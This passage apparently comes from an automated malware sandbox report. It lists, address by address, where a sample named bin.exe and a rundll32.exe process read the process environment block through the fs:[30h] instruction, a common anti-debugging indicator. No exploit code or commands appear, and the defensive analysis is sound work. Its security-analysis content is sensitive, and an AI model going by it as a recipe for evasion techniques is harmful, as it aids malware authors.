Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9240 mov eax, dword ptr fs:[00000030h] 3_2_00DA9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9240 mov eax, dword ptr fs:[00000030h] 3_2_00DA9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9240 mov eax, dword ptr fs:[00000030h] 3_2_00DA9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA9240 mov eax, dword ptr fs:[00000030h] 3_2_00DA9240
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE927A mov eax, dword ptr fs:[00000030h] 3_2_00DE927A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6EA55 mov eax, dword ptr fs:[00000030h] 3_2_00E6EA55
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E34257 mov eax, dword ptr fs:[00000030h] 3_2_00E34257
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC3A1C mov eax, dword ptr fs:[00000030h] 3_2_00DC3A1C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA5210 mov eax, dword ptr fs:[00000030h] 3_2_00DA5210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA5210 mov ecx, dword ptr fs:[00000030h] 3_2_00DA5210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA5210 mov eax, dword ptr fs:[00000030h] 3_2_00DA5210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DA5210 mov eax, dword ptr fs:[00000030h] 3_2_00DA5210
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00DAAA16
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00DAAA16
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB8A0A mov eax, dword ptr fs:[00000030h] 3_2_00DB8A0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00DE4A2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00DE4A2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E253CA mov eax, dword ptr fs:[00000030h] 3_2_00E253CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E253CA mov eax, dword ptr fs:[00000030h] 3_2_00E253CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DCDBE9 mov eax, dword ptr fs:[00000030h] 3_2_00DCDBE9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00DD03E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E75BA5 mov eax, dword ptr fs:[00000030h] 3_2_00E75BA5
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD2397 mov eax, dword ptr fs:[00000030h] 3_2_00DD2397
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDB390 mov eax, dword ptr fs:[00000030h] 3_2_00DDB390
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00DB1B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00DB1B8F
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E5D380 mov ecx, dword ptr fs:[00000030h] 3_2_00E5D380
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6138A mov eax, dword ptr fs:[00000030h] 3_2_00E6138A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00DD4BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00DD4BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00DD4BAD
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DAF358 mov eax, dword ptr fs:[00000030h] 3_2_00DAF358
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DADB40 mov eax, dword ptr fs:[00000030h] 3_2_00DADB40
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00DD3B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00DD3B7A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DADB60 mov ecx, dword ptr fs:[00000030h] 3_2_00DADB60
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E78B58 mov eax, dword ptr fs:[00000030h] 3_2_00E78B58
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6131B mov eax, dword ptr fs:[00000030h] 3_2_00E6131B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26CF0 mov eax, dword ptr fs:[00000030h] 3_2_00E26CF0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E614FB mov eax, dword ptr fs:[00000030h] 3_2_00E614FB
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E78CD6 mov eax, dword ptr fs:[00000030h] 3_2_00E78CD6
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DB849B mov eax, dword ptr fs:[00000030h] 3_2_00DB849B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDA44B mov eax, dword ptr fs:[00000030h] 3_2_00DDA44B
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DC746D mov eax, dword ptr fs:[00000030h] 3_2_00DC746D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3C450 mov eax, dword ptr fs:[00000030h] 3_2_00E3C450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E3C450 mov eax, dword ptr fs:[00000030h] 3_2_00E3C450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E61C06 mov eax, dword ptr fs:[00000030h] 3_2_00E61C06
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26C0A mov eax, dword ptr fs:[00000030h] 3_2_00E26C0A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E7740D mov eax, dword ptr fs:[00000030h] 3_2_00E7740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E7740D mov eax, dword ptr fs:[00000030h] 3_2_00E7740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E7740D mov eax, dword ptr fs:[00000030h] 3_2_00E7740D
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DDBC2C mov eax, dword ptr fs:[00000030h] 3_2_00DDBC2C
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E6FDE2 mov eax, dword ptr fs:[00000030h] 3_2_00E6FDE2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E58DF1 mov eax, dword ptr fs:[00000030h] 3_2_00E58DF1
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00E26DC9 mov eax, dword ptr fs:[00000030h] 3_2_00E26DC9
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00DBD5E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 3_2_00DBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00DBD5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438BC2C mov eax, dword ptr fs:[00000030h] 13_2_0438BC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438002D mov eax, dword ptr fs:[00000030h] 13_2_0438002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436B02A mov eax, dword ptr fs:[00000030h] 13_2_0436B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7016 mov eax, dword ptr fs:[00000030h] 13_2_043D7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7016 mov eax, dword ptr fs:[00000030h] 13_2_043D7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D7016 mov eax, dword ptr fs:[00000030h] 13_2_043D7016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04412073 mov eax, dword ptr fs:[00000030h] 13_2_04412073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04421074 mov eax, dword ptr fs:[00000030h] 13_2_04421074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6C0A mov eax, dword ptr fs:[00000030h] 13_2_043D6C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04411C06 mov eax, dword ptr fs:[00000030h] 13_2_04411C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442740D mov eax, dword ptr fs:[00000030h] 13_2_0442740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442740D mov eax, dword ptr fs:[00000030h] 13_2_0442740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0442740D mov eax, dword ptr fs:[00000030h] 13_2_0442740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04424015 mov eax, dword ptr fs:[00000030h] 13_2_04424015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04424015 mov eax, dword ptr fs:[00000030h] 13_2_04424015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437746D mov eax, dword ptr fs:[00000030h] 13_2_0437746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04370050 mov eax, dword ptr fs:[00000030h] 13_2_04370050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04370050 mov eax, dword ptr fs:[00000030h] 13_2_04370050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EC450 mov eax, dword ptr fs:[00000030h] 13_2_043EC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EC450 mov eax, dword ptr fs:[00000030h] 13_2_043EC450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438A44B mov eax, dword ptr fs:[00000030h] 13_2_0438A44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438F0BF mov ecx, dword ptr fs:[00000030h] 13_2_0438F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438F0BF mov eax, dword ptr fs:[00000030h] 13_2_0438F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438F0BF mov eax, dword ptr fs:[00000030h] 13_2_0438F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428CD6 mov eax, dword ptr fs:[00000030h] 13_2_04428CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043990AF mov eax, dword ptr fs:[00000030h] 13_2_043990AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043820A0 mov eax, dword ptr fs:[00000030h] 13_2_043820A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0436849B mov eax, dword ptr fs:[00000030h] 13_2_0436849B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359080 mov eax, dword ptr fs:[00000030h] 13_2_04359080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D3884 mov eax, dword ptr fs:[00000030h] 13_2_043D3884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D3884 mov eax, dword ptr fs:[00000030h] 13_2_043D3884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_044114FB mov eax, dword ptr fs:[00000030h] 13_2_044114FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 13_2_043D6CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 13_2_043D6CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D6CF0 mov eax, dword ptr fs:[00000030h] 13_2_043D6CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043558EC mov eax, dword ptr fs:[00000030h] 13_2_043558EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov ecx, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043EB8D0 mov eax, dword ptr fs:[00000030h] 13_2_043EB8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438513A mov eax, dword ptr fs:[00000030h] 13_2_0438513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438513A mov eax, dword ptr fs:[00000030h] 13_2_0438513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04363D34 mov eax, dword ptr fs:[00000030h] 13_2_04363D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384D3B mov eax, dword ptr fs:[00000030h] 13_2_04384D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384D3B mov eax, dword ptr fs:[00000030h] 13_2_04384D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04384D3B mov eax, dword ptr fs:[00000030h] 13_2_04384D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435AD30 mov eax, dword ptr fs:[00000030h] 13_2_0435AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043DA537 mov eax, dword ptr fs:[00000030h] 13_2_043DA537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov eax, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04374120 mov ecx, dword ptr fs:[00000030h] 13_2_04374120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359100 mov eax, dword ptr fs:[00000030h] 13_2_04359100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359100 mov eax, dword ptr fs:[00000030h] 13_2_04359100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04359100 mov eax, dword ptr fs:[00000030h] 13_2_04359100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437C577 mov eax, dword ptr fs:[00000030h] 13_2_0437C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437C577 mov eax, dword ptr fs:[00000030h] 13_2_0437C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435B171 mov eax, dword ptr fs:[00000030h] 13_2_0435B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435B171 mov eax, dword ptr fs:[00000030h] 13_2_0435B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0435C962 mov eax, dword ptr fs:[00000030h] 13_2_0435C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04377D50 mov eax, dword ptr fs:[00000030h] 13_2_04377D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437B944 mov eax, dword ptr fs:[00000030h] 13_2_0437B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0437B944 mov eax, dword ptr fs:[00000030h] 13_2_0437B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04428D34 mov eax, dword ptr fs:[00000030h] 13_2_04428D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04393D43 mov eax, dword ptr fs:[00000030h] 13_2_04393D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D3540 mov eax, dword ptr fs:[00000030h] 13_2_043D3540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D51BE mov eax, dword ptr fs:[00000030h] 13_2_043D51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D51BE mov eax, dword ptr fs:[00000030h] 13_2_043D51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D51BE mov eax, dword ptr fs:[00000030h] 13_2_043D51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D51BE mov eax, dword ptr fs:[00000030h] 13_2_043D51BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04381DB5 mov eax, dword ptr fs:[00000030h] 13_2_04381DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04381DB5 mov eax, dword ptr fs:[00000030h] 13_2_04381DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_04381DB5 mov eax, dword ptr fs:[00000030h] 13_2_04381DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043861A0 mov eax, dword ptr fs:[00000030h] 13_2_043861A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043861A0 mov eax, dword ptr fs:[00000030h] 13_2_043861A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043835A1 mov eax, dword ptr fs:[00000030h] 13_2_043835A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_043D69A6 mov eax, dword ptr fs:[00000030h] 13_2_043D69A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438FD9B mov eax, dword ptr fs:[00000030h] 13_2_0438FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0438FD9B mov eax, dword ptr fs:[00000030h] 13_2_0438FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 13_2_0441FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 13_2_0441FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 13_2_0441FDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0441FDE2 mov eax, dword ptr fs:[00000030h] 13_2_0441FDE2
